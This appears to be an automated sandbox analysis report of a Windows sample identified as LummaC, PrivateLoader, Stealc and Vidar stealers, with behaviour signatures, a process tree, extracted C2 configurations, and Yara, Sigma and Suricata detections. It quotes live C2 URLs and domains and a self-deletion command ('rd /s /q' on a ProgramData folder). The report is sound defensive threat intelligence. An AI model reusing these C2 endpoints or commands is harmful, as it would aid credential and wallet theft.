Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1523932
MD5:	6c7708b26af0449f2cd1caef277dce2e
SHA1:	1720b6892ef3825e39f7178584fff858ec3f73e9
SHA256:	3b3cb4613c52cc846462df404477b19a9454dc8d43bfb67b68c6e090bb012a4b
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, PrivateLoader, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PrivateLoader

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Drops PE files to the document folder of the user

Found API chain indicative of sandbox detection

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6C7708B26AF0449F2CD1CAEF277DCE2E)

LKMService.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: 6C7708B26AF0449F2CD1CAEF277DCE2E)

GoogleUpdater.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker MD5: 6C7708B26AF0449F2CD1CAEF277DCE2E)

596a8ed0706146e48ded9036d0de8611.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe" MD5: 34EC7A5A9154386680A400B65CADA6CB)

conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

SYvU5mYtoLg0LBOPe0pXYHty.exe (PID: 3192 cmdline: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe MD5: 022CC85ED0F56A3F3E8AEC4AE3B80A71)

conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 7876 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJDHJKFIE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

userEHJDHJKFIE.exe (PID: 8024 cmdline: "C:\Users\userEHJDHJKFIE.exe" MD5: 237AF39F8B579AAD0205F6174BB96239)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5164 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

GHDHDBAECG.exe (PID: 4296 cmdline: "C:\ProgramData\GHDHDBAECG.exe" MD5: C7E7CFC3ED17AEF6C67C265389593EE3)

conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5004 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2044 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

CBFIIEHJDB.exe (PID: 1516 cmdline: "C:\ProgramData\CBFIIEHJDB.exe" MD5: 237AF39F8B579AAD0205F6174BB96239)

conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6644 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6680 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

KEHDBAEGII.exe (PID: 6892 cmdline: "C:\ProgramData\KEHDBAEGII.exe" MD5: 022CC85ED0F56A3F3E8AEC4AE3B80A71)

conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7164 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 8028 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userDHDAFBFCFH.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

userDHDAFBFCFH.exe (PID: 7820 cmdline: "C:\Users\userDHDAFBFCFH.exe" MD5: 237AF39F8B579AAD0205F6174BB96239)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 8084 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCAAKKFHCFI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

userCAAKKFHCFI.exe (PID: 3912 cmdline: "C:\Users\userCAAKKFHCFI.exe" MD5: C7E7CFC3ED17AEF6C67C265389593EE3)

conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3060 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFCAFCFBAEH" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7440 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 1148 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBAKKEGCAAE.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

userBAKKEGCAAE.exe (PID: 8176 cmdline: "C:\Users\userBAKKEGCAAE.exe" MD5: C7E7CFC3ED17AEF6C67C265389593EE3)

conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

9nou8XrciU9ATc03f2Eu4OO2.exe (PID: 4180 cmdline: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe MD5: 237AF39F8B579AAD0205F6174BB96239)

conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6876 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

LKMService.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: 6C7708B26AF0449F2CD1CAEF277DCE2E)

WerFault.exe (PID: 8052 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7928 -s 944 MD5: C31336C1EFC2CCB44B4326EA793040F2)

LKMService.exe (PID: 7416 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: 6C7708B26AF0449F2CD1CAEF277DCE2E)

WerFault.exe (PID: 3428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 952 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
PrivateLoader	According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem	https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}

Threatname: LummaC

{"C2 url": ["treatynreit.site", "mysterisop.site", "absorptioniw.site", "chorusarorp.site", "snarlypagowo.site", "abnomalrkmu.site", "questionsmw.stor", "soldiefieop.site"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "8b4d47586874b08947203f03e4db3962"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000002D.00000002.2959845385.000000000122A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000F.00000002.2325083864.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000B.00000002.1895049208.0000000003D55000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: RegAsm.exe PID: 7856	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
Process Memory Space: SYvU5mYtoLg0LBOPe0pXYHty.exe PID: 3192	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 9nou8XrciU9ATc03f2Eu4OO2.exe PID: 4180	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 9nou8XrciU9ATc03f2Eu4OO2.exe PID: 4180	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 9nou8XrciU9ATc03f2Eu4OO2.exe PID: 4180	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 3128	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3128	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 3128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3128	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: RegAsm.exe PID: 6876	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6876	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5164	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5164	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 5164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5164	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 6704	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6704	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6212	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6212	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6212	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: RegAsm.exe PID: 1364	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1364	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author
15.2.RegAsm.exe.400000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
11.2.SYvU5mYtoLg0LBOPe0pXYHty.exe.3d55570.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
11.2.SYvU5mYtoLg0LBOPe0pXYHty.exe.3d55570.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
30.2.RegAsm.exe.400000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
30.2.RegAsm.exe.400000.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
30.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
30.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
15.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LKMService_59a59fb381b34871a4c71dd082707faa

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LKMService_59a59fb381b34871a4c71dd082707faa

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7428, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8739b66ba2a04fd0a320fa681982b133.lnk

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:34.848545+0200	2028765	3	Unknown Traffic	192.168.2.4	49761	49.12.197.9	443	TCP
2024-10-02T09:41:36.016611+0200	2028765	3	Unknown Traffic	192.168.2.4	49763	49.12.197.9	443	TCP
2024-10-02T09:41:37.380683+0200	2028765	3	Unknown Traffic	192.168.2.4	49766	49.12.197.9	443	TCP
2024-10-02T09:41:38.757464+0200	2028765	3	Unknown Traffic	192.168.2.4	49771	49.12.197.9	443	TCP
2024-10-02T09:41:40.226986+0200	2028765	3	Unknown Traffic	192.168.2.4	49773	49.12.197.9	443	TCP
2024-10-02T09:41:41.988085+0200	2028765	3	Unknown Traffic	192.168.2.4	49776	49.12.197.9	443	TCP
2024-10-02T09:41:42.985234+0200	2028765	3	Unknown Traffic	192.168.2.4	49778	49.12.197.9	443	TCP
2024-10-02T09:41:45.987426+0200	2028765	3	Unknown Traffic	192.168.2.4	49779	49.12.197.9	443	TCP
2024-10-02T09:41:47.457158+0200	2028765	3	Unknown Traffic	192.168.2.4	49780	49.12.197.9	443	TCP
2024-10-02T09:41:48.209550+0200	2028765	3	Unknown Traffic	192.168.2.4	49781	49.12.197.9	443	TCP
2024-10-02T09:41:49.259118+0200	2028765	3	Unknown Traffic	192.168.2.4	49782	49.12.197.9	443	TCP
2024-10-02T09:41:50.381063+0200	2028765	3	Unknown Traffic	192.168.2.4	49783	49.12.197.9	443	TCP
2024-10-02T09:41:52.265394+0200	2028765	3	Unknown Traffic	192.168.2.4	49784	49.12.197.9	443	TCP
2024-10-02T09:41:54.001607+0200	2028765	3	Unknown Traffic	192.168.2.4	49785	49.12.197.9	443	TCP
2024-10-02T09:41:55.683254+0200	2028765	3	Unknown Traffic	192.168.2.4	49787	49.12.197.9	443	TCP
2024-10-02T09:41:57.353797+0200	2028765	3	Unknown Traffic	192.168.2.4	49788	49.12.197.9	443	TCP
2024-10-02T09:41:58.678015+0200	2028765	3	Unknown Traffic	192.168.2.4	49789	49.12.197.9	443	TCP
2024-10-02T09:42:02.054842+0200	2028765	3	Unknown Traffic	192.168.2.4	49790	49.12.197.9	443	TCP
2024-10-02T09:42:03.779029+0200	2028765	3	Unknown Traffic	192.168.2.4	49791	49.12.197.9	443	TCP
2024-10-02T09:42:05.557439+0200	2028765	3	Unknown Traffic	192.168.2.4	49792	49.12.197.9	443	TCP
2024-10-02T09:42:06.998724+0200	2028765	3	Unknown Traffic	192.168.2.4	49793	49.12.197.9	443	TCP
2024-10-02T09:42:09.050279+0200	2028765	3	Unknown Traffic	192.168.2.4	49794	49.12.197.9	443	TCP
2024-10-02T09:42:11.654658+0200	2028765	3	Unknown Traffic	192.168.2.4	49797	49.12.197.9	443	TCP
2024-10-02T09:42:15.383085+0200	2028765	3	Unknown Traffic	192.168.2.4	49800	49.12.197.9	443	TCP
2024-10-02T09:42:17.992206+0200	2028765	3	Unknown Traffic	192.168.2.4	49803	49.12.197.9	443	TCP
2024-10-02T09:42:19.860183+0200	2028765	3	Unknown Traffic	192.168.2.4	49805	49.12.197.9	443	TCP
2024-10-02T09:42:21.973991+0200	2028765	3	Unknown Traffic	192.168.2.4	49808	49.12.197.9	443	TCP
2024-10-02T09:42:26.429175+0200	2028765	3	Unknown Traffic	192.168.2.4	49816	49.12.197.9	443	TCP
2024-10-02T09:42:27.795138+0200	2028765	3	Unknown Traffic	192.168.2.4	49818	49.12.197.9	443	TCP
2024-10-02T09:42:29.542408+0200	2028765	3	Unknown Traffic	192.168.2.4	49820	49.12.197.9	443	TCP
2024-10-02T09:42:30.828544+0200	2028765	3	Unknown Traffic	192.168.2.4	49822	49.12.197.9	443	TCP
2024-10-02T09:42:32.310288+0200	2028765	3	Unknown Traffic	192.168.2.4	49823	49.12.197.9	443	TCP
2024-10-02T09:42:33.798709+0200	2028765	3	Unknown Traffic	192.168.2.4	49825	49.12.197.9	443	TCP
2024-10-02T09:42:35.092990+0200	2028765	3	Unknown Traffic	192.168.2.4	49826	49.12.197.9	443	TCP
2024-10-02T09:42:38.294901+0200	2028765	3	Unknown Traffic	192.168.2.4	49828	49.12.197.9	443	TCP
2024-10-02T09:42:39.330354+0200	2028765	3	Unknown Traffic	192.168.2.4	49830	49.12.197.9	443	TCP
2024-10-02T09:42:51.926077+0200	2028765	3	Unknown Traffic	192.168.2.4	49843	49.12.197.9	443	TCP
2024-10-02T09:42:53.335362+0200	2028765	3	Unknown Traffic	192.168.2.4	49844	49.12.197.9	443	TCP
2024-10-02T09:42:54.710418+0200	2028765	3	Unknown Traffic	192.168.2.4	49846	49.12.197.9	443	TCP
2024-10-02T09:42:56.089844+0200	2028765	3	Unknown Traffic	192.168.2.4	49849	49.12.197.9	443	TCP
2024-10-02T09:42:57.630057+0200	2028765	3	Unknown Traffic	192.168.2.4	49852	49.12.197.9	443	TCP
